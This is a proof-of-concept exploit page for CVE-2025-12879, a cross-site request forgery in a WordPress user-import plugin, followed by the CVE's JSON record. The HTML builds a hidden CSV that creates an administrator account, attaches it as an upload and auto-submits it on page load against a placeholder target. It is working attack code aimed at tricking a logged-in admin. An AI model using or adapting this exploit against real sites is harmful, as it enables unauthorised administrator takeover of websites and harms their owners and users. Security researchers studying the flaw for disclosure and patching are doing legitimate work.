CVE-2025-12879

<!-- CSRF PoC for CVE-2025-12879 --> <!-- Create Admin Account via CSV Import --> <!DOCTYPE html> <html> <head> <title>CSRF Exploit - CVE-2025-12879</title> </head> <body> <h1>WordPress User Generator CSRF Exploit</h1> <p>Click the button below to create an admin account on the target site.</p> <form id="exploitForm" action="http://target-site.com/wp-admin/admin.php" method="POST" enctype="multipart/form-data"> <!-- WordPress admin page for user import --> <input type="hidden" name="page" value="user-import-and-generator"> <input type="hidden" name="action" value="import_users"> <!-- CSV file with malicious admin user --> <input type="hidden" name="import_file" id="csvFile"> <!-- CSV content: username,email,role --> <textarea id="csvData" style="display:none;"> username,email,role,password malicious_admin,[email protected],administrator,EvilPass123! </textarea> <button type="submit" id="exploitBtn">Execute Exploit</button> </form> <script> // Convert CSV data to blob for file upload function base64ToBlob(base64, mimeType) { const byteCharacters = atob(base64); const byteNumbers = new Array(byteCharacters.length); for (let i = 0; i < byteCharacters.length; i++) { byteNumbers[i] = byteCharacters.charCodeAt(i); } const byteArray = new Uint8Array(byteNumbers); return new Blob([byteArray], {type: mimeType}); } document.getElementById('exploitForm').addEventListener('submit', function(e) { e.preventDefault(); const csvContent = document.getElementById('csvData').textContent.trim(); const csvBlob = new Blob([csvContent], {type: 'text/csv'}); const dataTransfer = new DataTransfer(); const file = new File([csvBlob], 'users.csv', {type: 'text/csv'}); dataTransfer.items.add(file); const fileInput = document.getElementById('csvFile'); fileInput.files = dataTransfer.files; // Auto-submit after setting file this.submit(); }); // Auto-execute on page load window.onload = function() { setTimeout(function() { document.getElementById('exploitBtn').click(); }, 1000); }; </script> </body> </html>

{"cve": {"id": "CVE-2025-12879", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:46.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Generator and Importer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.2.2. This is due to missing nonce validation in the \"Import Using CSV File\" function. This makes it possible for unauthenticated attackers to elevate user privileges by creating arbitrary accounts with administrator privileges via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/user-importer-and-generator/tags/1.2.2/user-generator.php#L145", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/82699a17-ea45-4493-98c4-07f62ca0b1f9?source=cve", "source": "[email protected]"}]}}